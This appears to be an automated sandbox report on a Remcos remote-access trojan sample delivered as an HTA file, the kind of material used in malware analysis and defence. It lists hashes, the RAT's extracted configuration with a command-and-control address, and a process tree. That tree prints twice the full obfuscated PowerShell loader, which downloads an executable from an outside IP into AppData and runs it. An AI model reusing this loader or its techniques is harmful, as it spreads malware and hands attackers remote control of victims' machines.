remcos | 73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-12-2024 03:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644.hta
Size

143KB
MD5

fd6fc3abb81de5133fb2de54b937ca20
SHA1

241f7fa153504078a9a9b07f966f3c4e862a9545
SHA256

73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
SHA512

5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
SSDEEP

768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl

Score

10^/10

remcos elvis defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

elvis

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-GJDISH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	4948	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4948	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4668	nicetomeetyousweeet.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
4060	4668	WerFault.exe	97
4212	4668	WerFault.exe	97
2216	4668	WerFault.exe	97
4836	4668	WerFault.exe	97
1292	4668	WerFault.exe	97
228	4668	WerFault.exe	97
4664	4668	WerFault.exe	97
3524	4668	WerFault.exe	97
1868	4668	WerFault.exe	97
3576	4668	WerFault.exe	97
2684	4668	WerFault.exe	97
4676	4668	WerFault.exe	97
4972	4668	WerFault.exe	97
4692	4668	WerFault.exe	97
2232	4668	WerFault.exe	97
2224	4668	WerFault.exe	97
3704	4668	WerFault.exe	97
4688	4668	WerFault.exe	97
4124	4668	WerFault.exe	97
1828	4668	WerFault.exe	97
4552	4668	WerFault.exe	97
3916	4668	WerFault.exe	97
4888	4668	WerFault.exe	97
4076	4668	WerFault.exe	97
1256	4668	WerFault.exe	97
3600	4668	WerFault.exe	97
4824	4668	WerFault.exe	97
1380	4668	WerFault.exe	97
3676	4668	WerFault.exe	97
2300	4668	WerFault.exe	97
4196	4668	WerFault.exe	97
2596	4668	WerFault.exe	97
4540	4668	WerFault.exe	97
4040	4668	WerFault.exe	97
1384	4668	WerFault.exe	97
1356	4668	WerFault.exe	97
4980	4668	WerFault.exe	97
1008	4668	WerFault.exe	97
2904	4668	WerFault.exe	97
8	4668	WerFault.exe	97
2192	4668	WerFault.exe	97
1308	4668	WerFault.exe	97
1852	4668	WerFault.exe	97
3916	4668	WerFault.exe	97
4952	4668	WerFault.exe	97
772	4668	WerFault.exe	97
3612	4668	WerFault.exe	97
2336	4668	WerFault.exe	97
2632	4668	WerFault.exe	97
2176	4668	WerFault.exe	97
4008	4668	WerFault.exe	97
2164	4668	WerFault.exe	97
3576	4668	WerFault.exe	97
3236	4668	WerFault.exe	97
2168	4668	WerFault.exe	97
5020	4668	WerFault.exe	97
3720	4668	WerFault.exe	97
1092	4668	WerFault.exe	97
3436	4668	WerFault.exe	97
892	4668	WerFault.exe	97
3856	4668	WerFault.exe	97
1612	4668	WerFault.exe	97
4328	4668	WerFault.exe	97
1648	4668	WerFault.exe	97

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nicetomeetyousweeet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4948	powershell.exe
4948	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 3112	780	mshta.exe	85
PID 780 wrote to memory of 3112	780	mshta.exe	85
PID 780 wrote to memory of 3112	780	mshta.exe	85
PID 3112 wrote to memory of 4948	3112	cmd.exe	87
PID 3112 wrote to memory of 4948	3112	cmd.exe	87
PID 3112 wrote to memory of 4948	3112	cmd.exe	87
PID 4948 wrote to memory of 4148	4948	powershell.exe	89
PID 4948 wrote to memory of 4148	4948	powershell.exe	89
PID 4948 wrote to memory of 4148	4948	powershell.exe	89
PID 4148 wrote to memory of 1288	4148	csc.exe	90
PID 4148 wrote to memory of 1288	4148	csc.exe	90
PID 4148 wrote to memory of 1288	4148	csc.exe	90
PID 4948 wrote to memory of 4668	4948	powershell.exe	97
PID 4948 wrote to memory of 4668	4948	powershell.exe	97
PID 4948 wrote to memory of 4668	4948	powershell.exe	97

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:780
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wbs2a0es\wbs2a0es.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4148
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp" "c:\Users\Admin\AppData\Local\Temp\wbs2a0es\CSCABE1F43461F145418DE97A6446B939C1.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1288
  - - C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
      "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4668
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 620
        5⤵
        Program crash
        
        PID:4060
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 644
        5⤵
        Program crash
        
        PID:4212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 656
        5⤵
        Program crash
        
        PID:2216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 692
        5⤵
        Program crash
        
        PID:4836
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 628
        5⤵
        Program crash
        
        PID:1292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 748
        5⤵
        Program crash
        
        PID:228
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 656
        5⤵
        Program crash
        
        PID:4664
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 764
        5⤵
        Program crash
        
        PID:3524
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 656
        5⤵
        Program crash
        
        PID:1868
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 712
        5⤵
        Program crash
        
        PID:3576
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 656
        5⤵
        Program crash
        
        PID:2684
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 716
        5⤵
        Program crash
        
        PID:4676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 720
        5⤵
        Program crash
        
        PID:4972
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 616
        5⤵
        Program crash
        
        PID:4692
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 708
        5⤵
        Program crash
        
        PID:2232
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 628
        5⤵
        Program crash
        
        PID:2224
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 616
        5⤵
        Program crash
        
        PID:3704
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 684
        5⤵
        Program crash
        
        PID:4688
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 620
        5⤵
        Program crash
        
        PID:4124
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 628
        5⤵
        Program crash
        
        PID:1828
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 736
        5⤵
        Program crash
        
        PID:4552
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 676
        5⤵
        Program crash
        
        PID:3916
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 704
        5⤵
        Program crash
        
        PID:4888
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 788
        5⤵
        Program crash
        
        PID:4076
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 800
        5⤵
        Program crash
        
        PID:1256
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 812
        5⤵
        Program crash
        
        PID:3600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 776
        5⤵
        Program crash
        
        PID:4824
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 836
        5⤵
        Program crash
        
        PID:1380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 872
        5⤵
        Program crash
        
        PID:3676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 892
        5⤵
        Program crash
        
        PID:2300
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 820
        5⤵
        Program crash
        
        PID:4196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 880
        5⤵
        Program crash
        
        PID:2596
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 896
        5⤵
        Program crash
        
        PID:4540
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 852
        5⤵
        Program crash
        
        PID:4040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 896
        5⤵
        Program crash
        
        PID:1384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 824
        5⤵
        Program crash
        
        PID:1356
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 816
        5⤵
        Program crash
        
        PID:4980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 832
        5⤵
        Program crash
        
        PID:1008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 864
        5⤵
        Program crash
        
        PID:2904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 696
        5⤵
        Program crash
        
        PID:8
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 808
        5⤵
        Program crash
        
        PID:2192
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 776
        5⤵
        Program crash
        
        PID:1308
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 808
        5⤵
        Program crash
        
        PID:1852
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 924
        5⤵
        Program crash
        
        PID:3916
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 948
        5⤵
        Program crash
        
        PID:4952
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 964
        5⤵
        Program crash
        
        PID:772
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 948
        5⤵
        Program crash
        
        PID:3612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 808
        5⤵
        Program crash
        
        PID:2336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 952
        5⤵
        Program crash
        
        PID:2632
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 976
        5⤵
        Program crash
        
        PID:2176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1008
        5⤵
        Program crash
        
        PID:4008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 936
        5⤵
        Program crash
        
        PID:2164
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 980
        5⤵
        Program crash
        
        PID:3576
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 928
        5⤵
        Program crash
        
        PID:3236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 936
        5⤵
        Program crash
        
        PID:2168
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 968
        5⤵
        Program crash
        
        PID:5020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1028
        5⤵
        Program crash
        
        PID:3720
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 972
        5⤵
        Program crash
        
        PID:1092
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 940
        5⤵
        Program crash
        
        PID:3436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 988
        5⤵
        Program crash
        
        PID:892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1000
        5⤵
        Program crash
        
        PID:3856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 932
        5⤵
        Program crash
        
        PID:1612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 920
        5⤵
        Program crash
        
        PID:4328
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 976
        5⤵
        Program crash
        
        PID:1648
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 968
        5⤵
        
        PID:2904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 808
        5⤵
        
        PID:8
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1048
        5⤵
        
        PID:516
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 952
        5⤵
        
        PID:5024
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 940
        5⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1056
        5⤵
        
        PID:4076
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 968
        5⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1080
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 920
        5⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1068
        5⤵
        
        PID:4536
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1056
        5⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1068
        5⤵
        
        PID:1980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1060
        5⤵
        
        PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4668 -ip 4668
1⤵
PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4668 -ip 4668
1⤵
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4668 -ip 4668
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4668 -ip 4668
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4668 -ip 4668
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4668 -ip 4668
1⤵
PID:3368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4668 -ip 4668
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4668 -ip 4668
1⤵
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4668 -ip 4668
1⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4668 -ip 4668
1⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4668 -ip 4668
1⤵
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4668 -ip 4668
1⤵
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4668 -ip 4668
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4668 -ip 4668
1⤵
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4668 -ip 4668
1⤵
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4668 -ip 4668
1⤵
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4668 -ip 4668
1⤵
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4668 -ip 4668
1⤵
PID:2428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4668 -ip 4668
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4668 -ip 4668
1⤵
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4668 -ip 4668
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4668 -ip 4668
1⤵
PID:852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
